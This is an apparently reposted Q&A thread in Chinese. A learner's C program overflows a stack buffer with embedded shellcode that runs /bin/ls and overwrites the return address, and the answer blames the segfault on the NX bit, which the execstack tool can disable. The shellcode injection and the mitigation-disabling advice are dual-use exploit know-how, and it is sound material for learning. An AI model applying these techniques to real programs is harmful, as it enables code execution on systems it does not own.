ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

导致缓冲区溢出,段错误

2019-05-29 03:48:44  阅读:216  来源: 互联网

标签:c-3 linux assembly x86 buffer-overflow


我试图在以下非常简单的程序中导致缓冲区溢出:

#include <stdio.h>
#include <stdint.h>

void badf(int n, char c, char* buffer)
{

    char mycode[] = {
0xeb, 0x0f, 0xb8, 0x0b,
0x00, 0x00, 0x00, 0x8b,
0x1c, 0x24, 0x8d, 0x0c,
0x24, 0x31, 0xd2, 0xcd,
0x80, 0xe8, 0xec, 0xff, 
0xff, 0xff, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x6c, 
0x73, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00
}; // 37 bytes

// Overwrite Base Pointer
    //mycode[37] = 0x29;
//mycode[38] = 0xf4;
//mycode[39] = 0xff;
//mycode[40] = 0xbf;

    // Overwrite Instruction Pointer
    // Using debugger, found mycode[] to be loaded in: 0xbffff42d
    mycode[41] = 0x2d;
    mycode[42] = 0xf4;
    mycode[43] = 0xff;
    mycode[44] = 0xbf;

}

void f(int n, char c)
{
    char buffer[37];    
    badf(n,c,buffer);
}

void test()
{
    printf("test");
}

int main()
{
    f(37,0x00);
    return 0;
}

(我已成功设法从缓冲区溢出执行test()之前)现在我正在尝试通过在堆栈中使用mycode的开头覆盖指令指针来执行mycode [].

这只有一半工作,程序跳转到正确的地址,我可以在调试器中看到正确的机器代码,但随后崩溃时出现分段错误,而不是执行以下指令(参见屏幕截图).

我试图弄清楚为什么他在执行“注入”代码的内容之前崩溃了.我对这类东西比较新,我理解分段错误意味着我试图访问操作系统不希望我的内存?

(PS:32位Linux机器,用-fno-stack-protector编译,所以我可以玩这个东西)

(如果需要更多信息,我很乐意更新帖子)

解决方法:

如果它是Linux,你可以通过下载和安装execstack使其工作,并按照指令here.分段错误可能是你的elf二进制文件默认设置nx位的结果,exxstack有选择地撤消.如果这不起作用,您可能会触发其他保护,您可能会或可能无法禁用这些保护.

标签:c-3,linux,assembly,x86,buffer-overflow
来源: https://codeday.me/bug/20190529/1175987.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有